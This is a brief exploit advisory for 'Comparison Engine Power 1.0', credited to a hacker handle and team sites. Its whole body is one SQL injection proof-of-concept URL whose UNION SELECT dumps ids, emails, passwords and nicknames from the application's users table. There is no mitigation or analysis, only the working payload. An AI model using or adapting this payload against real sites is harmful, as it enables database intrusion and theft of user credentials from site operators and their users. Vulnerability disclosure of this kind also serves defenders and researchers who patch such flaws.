######################################################
[+] Comparison Engine Power 1.0 SQL Injection Vulnerability
[+] Discovered By SirGod
[+] www.mortal-team.org
[+] www.h4cky0u.org
#######################################################

[+] SQL Injection

 PoC :

   http://www.kalptarudemos.com/demo/comparisonengine/product.comparision.php?cat=null
union all select 1,concat_ws(0x3a,id,email,password,nickname),3,4,5
from daype_users_tb--&name=GSM

########################################################